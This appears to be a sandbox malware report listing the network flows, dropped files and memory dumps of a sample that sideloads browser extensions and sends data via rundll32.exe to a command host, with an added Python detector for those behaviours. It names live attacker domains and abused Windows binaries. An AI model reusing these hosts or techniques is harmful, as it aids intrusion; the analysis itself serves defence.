                                                                                                              Expires: Mon, 26 Aug 2024 05:19:28 GMT
                                                                                                              Cache-Control: public, max-age=3000
                                                                                                              Age: 2088
                                                                                                              Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                                              Content-Type: application/pkix-crl
                                                                                                              Vary: Accept-Encoding
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              o.pki.goog
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              o.pki.goog
                                                                                                              IN A
                                                                                                              Response
                                                                                                              o.pki.goog
                                                                                                              IN CNAME
                                                                                                              pki-goog.l.google.com
                                                                                                              pki-goog.l.google.com
                                                                                                              IN A
                                                                                                              216.58.214.163
                                                                                                            • flag-fr
                                                                                                              GET
                                                                                                              http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCjHbN8Q48ByBJsBZfEZOeO
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              216.58.214.163:80
                                                                                                              Request
                                                                                                              GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCjHbN8Q48ByBJsBZfEZOeO HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                              Host: o.pki.goog
                                                                                                              Response
                                                                                                              HTTP/1.1 200 OK
                                                                                                              Server: ocsp_responder
                                                                                                              Content-Length: 472
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Date: Mon, 26 Aug 2024 04:59:21 GMT
                                                                                                              Cache-Control: public, max-age=14400
                                                                                                              Content-Type: application/ocsp-response
                                                                                                              Age: 295
                                                                                                            • flag-fr
                                                                                                              GET
                                                                                                              http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHGN%2BKTRSIp4CcztJxB9gYQ%3D
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              216.58.214.163:80
                                                                                                              Request
                                                                                                              GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHGN%2BKTRSIp4CcztJxB9gYQ%3D HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                              Host: o.pki.goog
                                                                                                              Response
                                                                                                              HTTP/1.1 200 OK
                                                                                                              Server: ocsp_responder
                                                                                                              Content-Length: 471
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Date: Mon, 26 Aug 2024 04:21:26 GMT
                                                                                                              Cache-Control: public, max-age=14400
                                                                                                              Content-Type: application/ocsp-response
                                                                                                              Age: 2570
                                                                                                            • flag-fr
                                                                                                              GET
                                                                                                              http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHM9QmVn2rE0CqmPuQDOLLc%3D
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              216.58.214.163:80
                                                                                                              Request
                                                                                                              GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHM9QmVn2rE0CqmPuQDOLLc%3D HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                              Host: o.pki.goog
                                                                                                              Response
                                                                                                              HTTP/1.1 200 OK
                                                                                                              Server: ocsp_responder
                                                                                                              Content-Length: 471
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              Date: Mon, 26 Aug 2024 04:34:52 GMT
                                                                                                              Cache-Control: public, max-age=14400
                                                                                                              Content-Type: application/ocsp-response
                                                                                                              Age: 1765
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              clients2.google.com
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              clients2.google.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                              clients2.google.com
                                                                                                              IN CNAME
                                                                                                              clients.l.google.com
                                                                                                              clients.l.google.com
                                                                                                              IN A
                                                                                                              172.217.18.206
                                                                                                            • flag-fr
                                                                                                              GET
                                                                                                              https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&rAOuOSNtrU
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              172.217.18.206:443
                                                                                                              Request
                                                                                                              GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&rAOuOSNtrU HTTP/1.1
                                                                                                              Host: clients2.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Response
                                                                                                              HTTP/1.1 302 Moved Temporarily
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-frbVhUjIEdvr2UF8-v7fEg' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 26 Aug 2024 05:04:16 GMT
                                                                                                              Location: https://clients2.googleusercontent.com/crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Server: GSE
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Accept-Ranges: none
                                                                                                              Vary: Accept-Encoding
                                                                                                              Transfer-Encoding: chunked
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              clients2.googleusercontent.com
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              clients2.googleusercontent.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                              clients2.googleusercontent.com
                                                                                                              IN CNAME
                                                                                                              googlehosted.l.googleusercontent.com
                                                                                                              googlehosted.l.googleusercontent.com
                                                                                                              IN A
                                                                                                              142.250.178.129
                                                                                                            • flag-fr
                                                                                                              GET
                                                                                                              https://clients2.googleusercontent.com/crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                              gLYDEcB.exe
                                                                                                              Remote address:
                                                                                                              142.250.178.129:443
                                                                                                              Request
                                                                                                              GET /crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: clients2.googleusercontent.com
                                                                                                              Response
                                                                                                              HTTP/1.1 200 OK
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 26186
                                                                                                              X-GUploader-UploadID: AHxI1nNL7H3AJRDcftdM8nudrN063LHkjG-K2xCLaAq_CiodWecH9ArWxzdSUlfXc63WthxHMbk
                                                                                                              X-Goog-Hash: crc32c=i5zIOg==
                                                                                                              Server: UploadServer
                                                                                                              Date: Sun, 25 Aug 2024 07:35:10 GMT
                                                                                                              Expires: Mon, 25 Aug 2025 07:35:10 GMT
                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                              Age: 77347
                                                                                                              Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
                                                                                                              ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
                                                                                                              Content-Type: application/x-chrome-extension
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              api5.check-data.xyz
                                                                                                              rundll32.exe
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              api5.check-data.xyz
                                                                                                              IN A
                                                                                                              Response
                                                                                                              api5.check-data.xyz
                                                                                                              IN CNAME
                                                                                                              checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                              checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                              IN A
                                                                                                              44.228.3.54
checkdata-1114476139.us-west-2.elb.amazonaws.com IN A 44.224.108.88

• POST http://api5.check-data.xyz/api2/google_api_ifi
  Process: rundll32.exe
  Remote address: 44.228.3.54:80

  Request
  POST /api2/google_api_ifi HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
  Host: api5.check-data.xyz
  Content-Length: 722
  Connection: Keep-Alive
  Cache-Control: no-cache

  Response
  HTTP/1.1 200 OK
  Access-Control-Allow-Origin: *
  Cache-control: no-cache="set-cookie"
  Content-Type: text/html; charset=UTF-8
  Date: Mon, 26 Aug 2024 05:01:28 GMT
  Server: nginx
  Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
  Content-Length: 0
  Connection: keep-alive
Network connections. Columns: remote address, domain or URL, protocol, process, bytes sent, bytes received, packets sent, packets received ("-" marks a protocol field that is empty in the report). HTTP exchanges and DNS answers belonging to a connection are listed indented beneath it.

• 54.210.117.250:443  service-domain.xyz  tls  gLYDEcB.exe  399 B  219 B  5  5
• 54.210.117.250:443  service-domain.xyz  tls  gLYDEcB.exe  361 B  219 B  5  5
• 54.210.117.250:443  service-domain.xyz  tls  gLYDEcB.exe  334 B  219 B  6  5
• 54.210.117.250:443  service-domain.xyz  -  gLYDEcB.exe  190 B  92 B  4  2
• 216.58.214.163:80  http://c.pki.goog/r/r1.crl  http  gLYDEcB.exe  394 B  1.7kB  6  4
    GET http://c.pki.goog/r/r1.crl -> 200
• 216.58.214.163:80  http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHM9QmVn2rE0CqmPuQDOLLc%3D  http  gLYDEcB.exe  1.2kB  3.1kB  10  6
    GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCjHbN8Q48ByBJsBZfEZOeO -> 200
    GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHGN%2BKTRSIp4CcztJxB9gYQ%3D -> 200
    GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEHM9QmVn2rE0CqmPuQDOLLc%3D -> 200
• 172.217.18.206:443  https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&rAOuOSNtrU  tls, http  gLYDEcB.exe  1.1kB  8.6kB  10  12
    GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&rAOuOSNtrU -> 302
• 142.250.178.129:443  https://clients2.googleusercontent.com/crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx  tls, http  gLYDEcB.exe  1.6kB  38.0kB  21  32
    GET https://clients2.googleusercontent.com/crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2hNmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx -> 200
• 44.228.3.54:80  http://api5.check-data.xyz/api2/google_api_ifi  http  rundll32.exe  1.2kB  536 B  5  3
    POST http://api5.check-data.xyz/api2/google_api_ifi -> 200
• 8.8.8.8:53  service-domain.xyz  dns  gLYDEcB.exe  64 B  80 B  1  1
    DNS service-domain.xyz -> 54.210.117.250
• 8.8.8.8:53  c.pki.goog  dns  gLYDEcB.exe  56 B  107 B  1  1
    DNS c.pki.goog -> 216.58.214.163
• 8.8.8.8:53  o.pki.goog  dns  gLYDEcB.exe  56 B  107 B  1  1
    DNS o.pki.goog -> 216.58.214.163
• 8.8.8.8:53  clients2.google.com  dns  gLYDEcB.exe  65 B  105 B  1  1
    DNS clients2.google.com -> 172.217.18.206
• 8.8.8.8:53  clients2.googleusercontent.com  dns  gLYDEcB.exe  76 B  121 B  1  1
    DNS clients2.googleusercontent.com -> 142.250.178.129
• 8.8.8.8:53  api5.check-data.xyz  dns  rundll32.exe  65 B  159 B  1  1
    DNS api5.check-data.xyz -> 44.228.3.54, 44.224.108.88
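Two things in the connection list above are what a detection engineer would want to catch: rundll32.exe, a signed Windows utility with no business talking HTTP, POSTing to api5.check-data.xyz with a User-Agent that claims "Chrome/0"; and the dropped gLYDEcB.exe pulling the Chrome Web Store extension oikgcnjambfooaigmdljblbaeelmekem through the update endpoint and the CRX blob host without Chrome being involved, which is the download half of the extension sideloading visible in the Downloads section. The Python below is an added example and not part of the tria.ge report or of the sample: it runs those checks over records constructed from the values in the table (the flat record layout with process, method, url and user_agent fields is an assumption, as is the LOLBIN list).

```python
"""Triage of sandbox network records for LOLBin egress and browser-extension sideloading.

Added example; this is not code from tria.ge or from the analysed sample. The flat
record layout (process, method, url, user_agent) is an assumed simplification of the
report's network and HTTP tables; the field values are copied from the report.
"""
import re
from urllib.parse import parse_qs, urlsplit

BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}
# Signed Windows binaries routinely abused as proxies that rarely need to speak HTTP (assumed list).
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe"}
CHROME_UA = re.compile(r"Chrome/(\d+)")

# Constructed records using the URLs, processes and User-Agent shown in the report above.
SAMPLE_FLOWS = [
    {"process": "rundll32.exe", "method": "POST",
     "url": "http://api5.check-data.xyz/api2/google_api_ifi",
     "user_agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 "
                   "(KHTML, like Gecko) Chrome/0 Safari/537.36"},
    {"process": "gLYDEcB.exe", "method": "GET",
     "url": "http://c.pki.goog/r/r1.crl", "user_agent": None},
    {"process": "gLYDEcB.exe", "method": "GET",
     "url": ("https://clients2.google.com/service/update2/crx?response=redirect&os=win"
             "&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86"
             "&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem"
             "%26installsource%3Dondemand%26uc&rAOuOSNtrU"),
     "user_agent": None},
    {"process": "gLYDEcB.exe", "method": "GET",
     "url": ("https://clients2.googleusercontent.com/crx/blobs/AVsOOGimIxh1rhNkuyBhew9Hsf2h"
             "NmyMgOraF_izzMtJtEXlIssKc0YNwVz8wTsE4nylCKjkrZ9hsfVrr9F_gdbV0xXIN1fbRZEs0PBfI"
             "-72wNWYv83mAMZSmuVBqaBj-sl4F5ifoVjF0_R2Kfnyog/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx"),
     "user_agent": None},
]


def crx_extension_id(url):
    """Extension ID fetched from the Chrome Web Store update or blob endpoint, else None."""
    parts = urlsplit(url)
    if parts.hostname == "clients2.google.com" and parts.path == "/service/update2/crx":
        # parse_qs percent-decodes, so x reads "id=<ext>&installsource=ondemand&uc".
        x = parse_qs(parts.query).get("x", [""])[0]
        m = re.match(r"id=([a-p]{32})", x)  # Web Store IDs use the a-p alphabet
        return m.group(1) if m else None
    if parts.hostname == "clients2.googleusercontent.com" and parts.path.startswith("/crx/blobs/"):
        # Blob file names are <UPPERCASE ID>_<version>.crx
        m = re.search(r"/([A-P]{32})_[\d_]+\.crx$", parts.path)
        return m.group(1).lower() if m else None
    return None


def triage_flow(flow):
    """Findings for one record; an empty list means nothing in it looks suspicious."""
    proc = flow["process"].lower()
    host = urlsplit(flow["url"]).hostname
    findings = []
    if proc in LOLBINS:
        findings.append(f"{proc} originates HTTP {flow['method']} to {host}")
    m = CHROME_UA.search(flow.get("user_agent") or "")
    if m and proc not in BROWSERS:
        findings.append(f"{proc} presents a Chrome User-Agent")
        if m.group(1) == "0":
            findings.append("User-Agent claims Chrome/0, a version no real browser reports")
    ext = crx_extension_id(flow["url"])
    if ext and proc not in BROWSERS:
        findings.append(f"{proc} pulls Web Store extension {ext} outside of Chrome")
    return findings


def triage(flows):
    """Map the URL of every suspicious record to its findings; clean records are dropped."""
    report = {}
    for flow in flows:
        findings = triage_flow(flow)
        if findings:
            report[flow["url"]] = findings
    return report


if __name__ == "__main__":
    for url, reasons in triage(SAMPLE_FLOWS).items():
        print(urlsplit(url).hostname)
        for reason in reasons:
            print("  -", reason)
```

The CRL and OCSP fetches to c.pki.goog and o.pki.goog produce no finding on purpose: any process that validates a Google-issued TLS certificate makes them, so they only carry signal in combination with the other flows. The extension ID extracted from the update URL and from the blob file name is the same value, which is the pivot into the Chrome profile and Firefox features directory entries under Downloads.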

                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                            Downloads

                                                                                                            • C:\Program Files (x86)\BnSeAqsvAhUdC\nYKHVyW.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              b731bebaa7c2551eed44d76cd5e76ff3

                                                                                                              SHA1

                                                                                                              965b3a0c57891661454681f1f6acbcb282321fd0

                                                                                                              SHA256

                                                                                                              81df7344c54b6be5bece3eacf37ab55125a13111f348b1107af482dfcdb27891

                                                                                                              SHA512

                                                                                                              fa747a132f7ea38ae407808fe298243f21d7bb725e79c2e9ba793f2bacaf3277d958d43355ea53e6871024d9a303a3f1eda7dee46b1d06b5122253d9aad67817

                                                                                                            • C:\Program Files (x86)\MivewcCGXeCU2\pfpSGyE.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              3019b73c639d36635656868079266e22

                                                                                                              SHA1

                                                                                                              02ba8c9fae452ba2d13b73330a34a69f5245b550

                                                                                                              SHA256

                                                                                                              2c341aa3858b5cc69c135865c8cdc895afc5011b6e5ec27ecbfe765c076f4d4e

                                                                                                              SHA512

                                                                                                              e8e5aab3bccaaf31364fc14a44c2ab33004c2dcd7987cd34342657ebf5a1ef737b723732411733c011e25bd7d2dd1cdb14eb63fd538fe8f9e2f43e188fd61a1a

                                                                                                            • C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR\izElhPb.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              7f074d6d3dc8ba867cb1a9595d75fa82

                                                                                                              SHA1

                                                                                                              ba9940e7d8e308900dd00ccba56792267e8fd760

                                                                                                              SHA256

                                                                                                              013b14d5876c1cd228c502195410fb6fc4e3d5d1bab9ef8b2510aa7559de6afe

                                                                                                              SHA512

                                                                                                              fddece89e378bbc5115792e7d65e08ed0b9e0d72bf36e682891e46c21493ad1a80071eb53bedaf1011859e9c8e7f830504610c3e61305b631dce72f988778562

                                                                                                            • C:\Program Files (x86)\rksWaXujU\dgpWayZ.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              e3124c51196627235f81021202497539

                                                                                                              SHA1

                                                                                                              47c94b60c6beda449239806d837a6aa9db5e9f24

                                                                                                              SHA256

                                                                                                              41fcef80af53d1b93a4f92c8e636572d8c4aeecb5fc3214e6ef61a0225f69b73

                                                                                                              SHA512

                                                                                                              b7b7583d5106f43ba4b28e6963f6d8e934626e79438bc1c33cedc63f04e4b6031caa2ff4f9fa933a61a26bb458b7b59eeea9b38553fe08c59c99cc91242582d8

                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                              Filesize

                                                                                                              2.0MB


• C:\ProgramData\BiTaXhratCGNPnVB\OqlCPyB.xml (Filesize 2KB)


• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json (Filesize 187B)


• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json (Filesize 136B)


• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json (Filesize 150B)


• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences (Filesize 10KB)


• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (Filesize 7KB)


• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (Filesize 7KB)


• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (Filesize 7KB)


• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js (Filesize 7KB)


• C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf (Filesize 9KB)


• C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll (Filesize 6.5MB)


• C:\Windows\system32\GroupPolicy\Machine\Registry.pol (Filesize 6KB)


• \Users\Admin\AppData\Local\Temp\7zSC67A.tmp\Install.exe (Filesize 6.4MB)


• \Users\Admin\AppData\Local\Temp\7zSC8CB.tmp\Install.exe (Filesize 6.6MB)


• memory/612-319-0x0000000002C30000-0x0000000002CBC000-memory.dmp (Filesize 560KB)
• memory/612-329-0x0000000002A10000-0x0000000002AE3000-memory.dmp (Filesize 844KB)
• memory/612-87-0x00000000002E0000-0x0000000000987000-memory.dmp (Filesize 6.7MB)
• memory/612-89-0x0000000010000000-0x00000000105E3000-memory.dmp (Filesize 5.9MB)
• memory/612-101-0x0000000002200000-0x0000000002285000-memory.dmp (Filesize 532KB)
• memory/612-364-0x00000000002E0000-0x0000000000987000-memory.dmp (Filesize 6.7MB)
• memory/612-135-0x00000000002E0000-0x0000000000987000-memory.dmp (Filesize 6.7MB)
• memory/612-136-0x00000000025E0000-0x0000000002648000-memory.dmp (Filesize 416KB)
• memory/2068-44-0x0000000000D00000-0x00000000013A7000-memory.dmp (Filesize 6.7MB)
• memory/2068-46-0x0000000010000000-0x00000000105E3000-memory.dmp (Filesize 5.9MB)
• memory/2068-88-0x0000000000D00000-0x00000000013A7000-memory.dmp (Filesize 6.7MB)
• memory/2068-58-0x0000000000D00000-0x00000000013A7000-memory.dmp (Filesize 6.7MB)
• memory/2116-39-0x0000000001130000-0x00000000017D7000-memory.dmp (Filesize 6.7MB)
• memory/2116-29-0x0000000010000000-0x00000000105E3000-memory.dmp (Filesize 5.9MB)
• memory/2116-23-0x0000000001130000-0x00000000017D7000-memory.dmp (Filesize 6.7MB)
• memory/2116-24-0x00000000009B0000-0x0000000001057000-memory.dmp (Filesize 6.7MB)
• memory/2116-25-0x00000000009B0000-0x0000000001057000-memory.dmp (Filesize 6.7MB)
• memory/2116-26-0x00000000009B0000-0x0000000001057000-memory.dmp (Filesize 6.7MB)
• memory/2276-68-0x000000001B590000-0x000000001B872000-memory.dmp (Filesize 2.9MB)
• memory/2276-69-0x00000000027A0000-0x00000000027A8000-memory.dmp (Filesize 32KB)
• memory/2312-18-0x00000000024A0000-0x0000000002B47000-memory.dmp (Filesize 6.7MB)
• memory/2396-57-0x0000000002040000-0x0000000002048000-memory.dmp (Filesize 32KB)
• memory/2396-56-0x000000001B750000-0x000000001BA32000-memory.dmp (Filesize 2.9MB)
• memory/2704-352-0x0000000001310000-0x00000000018F3000-memory.dmp (Filesize 5.9MB)
